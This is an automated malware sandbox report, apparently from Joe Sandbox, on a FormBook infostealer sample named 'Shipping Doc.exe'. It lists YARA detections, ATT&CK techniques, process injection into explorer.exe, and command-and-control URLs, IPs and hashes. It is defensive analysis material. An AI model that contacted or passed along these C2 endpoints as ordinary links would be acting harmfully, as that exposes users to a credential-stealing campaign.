          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 121 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | - | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 2 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Timestomp 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction

          Behavior Graph

          Behavior Graph ID: 458885 | Sample: Shipping Doc.exe | Startdate: 03/08/2021 | Architecture: WINDOWS | Score: 100

          Start
            Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
            -> Shipping Doc.exe (3) [started]
                 Dropped file: C:\Users\user\...\Shipping Doc.exe.log, ASCII
                 -> Shipping Doc.exe [started]
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                      -> explorer.exe [injected]
                           DNS/IP: www.bigdaddy.fish 208.113.204.236, 49742, 80 DREAMHOST-ASUS United States; www.davinescosmetics.com; davinescosmetics.com 34.102.136.180, 49744, 80 GOOGLEUS United States
                           Signature: System process connects to network (likely due to code injection or exploit)
                           -> cscript.exe [started]
                                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                -> cmd.exe (1) [started]
                                     -> conhost.exe [started]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Shipping Doc.exe | 51% | Virustotal | -
          Shipping Doc.exe | 37% | Metadefender | -
          Shipping Doc.exe | 26% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
          Shipping Doc.exe | 100% | Joe Sandbox ML | -

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.2.Shipping Doc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.jiyu-kobo.co.jp/argeg | 0% | Avira URL Cloud | safe
          http://www.sajatypeworks.comiv | 0% | URL Reputation | safe
          http://www.founder.com.cn/cnP | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/vam& | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/fr-f | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/siv | 0% | URL Reputation | safe
          http://www.davinescosmetics.com/amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR | 0% | Avira URL Cloud | safe
          http://www.fonts.comny | 0% | Avira URL Cloud | safe
          http://www.tiro.comI | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.fontbureau.comcomFU | 0% | Avira URL Cloud | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/en-u | 0% | Avira URL Cloud | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.fontbureau.comalsdn | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/8 | 0% | URL Reputation | safe
          http://www.fontbureau.comlicd | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cny | 0% | URL Reputation | safe
          http://www.fonts.comicV | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/0 | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.ascendercorp.com/typedesigners.html | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.sakkal.comc | 0% | Avira URL Cloud | safe
          http://www.urwpp.de | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/Y0a | 0% | Avira URL Cloud | safe
          http://www.sajatypeworks.coma7 | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cnd | 0% | URL Reputation | safe
          http://www.bigdaddy.fish/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/U | 0% | URL Reputation | safe
          www.shopjempress.com/amb6/ | 0% | Avira URL Cloud | safe
          http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/jp/n | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/jp/q | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cnz | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/B | 0% | URL Reputation | safe
          http://www.fontbureau.comd | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/; | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/Y0/ | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn8 | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn4 | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/d | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn& | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/en-ut | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.bigdaddy.fish | 208.113.204.236 | true | true | - | unknown
          davinescosmetics.com | 34.102.136.180 | true | false | - | unknown
          www.davinescosmetics.com | unknown | unknown | true | - | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.davinescosmetics.com/amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR | false | Avira URL Cloud: safe | unknown
          http://www.bigdaddy.fish/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR | true | Avira URL Cloud: safe | unknown
          www.shopjempress.com/amb6/ | true | Avira URL Cloud: safe | low

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.jiyu-kobo.co.jp/argeg | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.fontbureau.com/designersG | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.sajatypeworks.comiv | Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cnP | Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.fontbureau.com/designers/? | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.jiyu-kobo.co.jp/vam& | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/fr-f | Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.tiro.com | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.jiyu-kobo.co.jp/siv | Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.fonts.comny | Shipping Doc.exe, 00000002.00000003.213474844.000000000579B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.tiro.comI | Shipping Doc.exe, 00000002.00000003.214716683.000000000579B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.goodfont.co.kr | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.comcomFU | Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.typography.netD | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | Shipping Doc.exe, 00000002.00000003.222324750.0000000005792000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.jiyu-kobo.co.jp/en-u | Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.comalsdn | Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/8 | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.comlicd | Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.founder.com.cn/cny | Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fonts.comicV | Shipping Doc.exe, 00000002.00000003.213525769.000000000579B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/0 | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/DPlease | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.ascendercorp.com/typedesigners.html | Shipping Doc.exe, 00000002.00000003.218505402.00000000057C6000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fonts.com | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.sandoll.co.kr | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.urwpp.deDPlease | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sakkal.comc | Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.urwpp.de | Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.zhongyicts.com.cn | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sakkal.com | Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.jiyu-kobo.co.jp/Y0a | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.sajatypeworks.coma7 | Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.founder.com.cn/cnd | Shipping Doc.exe, 00000002.00000003.215912066.000000000578E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.fontbureau.com | Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.jiyu-kobo.co.jp/U | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC | cscript.exe, 0000000F.00000002.483172630.0000000005E2F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/jp/n | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/jp/q | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.founder.com.cn/cnz | Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/jp/ | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.jiyu-kobo.co.jp/B | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.comd | Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.jiyu-kobo.co.jp/; | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn/ | Shipping Doc.exe, 00000002.00000003.216788502.0000000005786000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.founder.com.cn/cn | Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-jones.html | Shipping Doc.exe, 00000002.00000003.219469628.0000000005799000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.jiyu-kobo.co.jp/Y0/ | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn8 | Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.jiyu-kobo.co.jp/ | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn4 | Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.fontbureau.com/designers8 | explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | false | - | high
          http://www.jiyu-kobo.co.jp/d | Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | false
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cn&Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designers/Shipping Doc.exe, 00000002.00000003.219138017.00000000057BE000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.jiyu-kobo.co.jp/en-utShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown

                                      Contacted IPs


                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | davinescosmetics.com | United States | 15169 | GOOGLE (US) | false
208.113.204.236 | www.bigdaddy.fish | United States | 26347 | DREAMHOST-AS (US) | true

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:458885
                                      Start date:03.08.2021
                                      Start time:20:39:22
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 42s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:Shipping Doc.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:24
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@7/1@2/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 67.2% (good quality ratio 62.1%)
                                      • Quality average: 69.6%
                                      • Quality standard deviation: 31.4%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 13.88.21.125, 23.211.4.86, 20.82.210.154, 173.222.108.226, 173.222.108.210, 51.103.5.186, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.49.157.6
                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net
• Not all processes were analyzed; the report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

Time | Type | Description
20:40:34 | API Interceptor | 1x Sleep call for process: Shipping Doc.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
DREAMHOST-AS (US) | ORDER_0009_PDF.exe | malicious | 69.163.167.176
DREAMHOST-AS (US) | A77HHPWkxJ.dll | malicious | 208.113.160.88
DREAMHOST-AS (US) | YaRh8PG41y.exe | malicious | 69.163.228.182
DREAMHOST-AS (US) | uw01Qp8GcO.exe | malicious | 69.163.228.182
DREAMHOST-AS (US) | PAYMENT_COPY.exe | malicious | 69.163.224.143
DREAMHOST-AS (US) | Order-CNS Amura Precision Co., Ltd 9A210118KR.exe | malicious | 69.163.224.174
DREAMHOST-AS (US) | USD980950_Swift.exe | malicious | 173.236.228.194
DREAMHOST-AS (US) | Order Signed PEARLTECH contract and PO.exe | malicious | 69.163.224.174
DREAMHOST-AS (US) | HSBCpaymentSlipPDF.exe | malicious | 69.163.226.116
DREAMHOST-AS (US) | NEW ORDER.xlsx | malicious | 75.119.198.195
DREAMHOST-AS (US) | Order_1537-25.exe | malicious | 208.113.197.232
DREAMHOST-AS (US) | Order 5122948.xlsb | malicious | 64.111.126.83
DREAMHOST-AS (US) | Order 5122948.xlsb | malicious | 64.111.126.83
DREAMHOST-AS (US) | INS 0966828.xlsb | malicious | 64.111.126.83
DREAMHOST-AS (US) | Order 2522592.xlsb | malicious | 64.111.126.83
DREAMHOST-AS (US) | INS 0966828.xlsb | malicious | 64.111.126.83
DREAMHOST-AS (US) | Order 2522592.xlsb | malicious | 64.111.126.83
DREAMHOST-AS (US) | INS 53614716.xlsb | malicious | 64.111.126.83
DREAMHOST-AS (US) | WO 2825876.xlsb | malicious | 64.111.126.83
DREAMHOST-AS (US) | INS 53614716.xlsb | malicious | 64.111.126.83

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Doc.exe.log
                                      Process:C:\Users\user\Desktop\Shipping Doc.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.355304211458859
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                      MD5:69206D3AF7D6EFD08F4B4726998856D3
                                      SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                      SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                      SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                      Malicious:true
                                      Reputation:high, very likely benign file
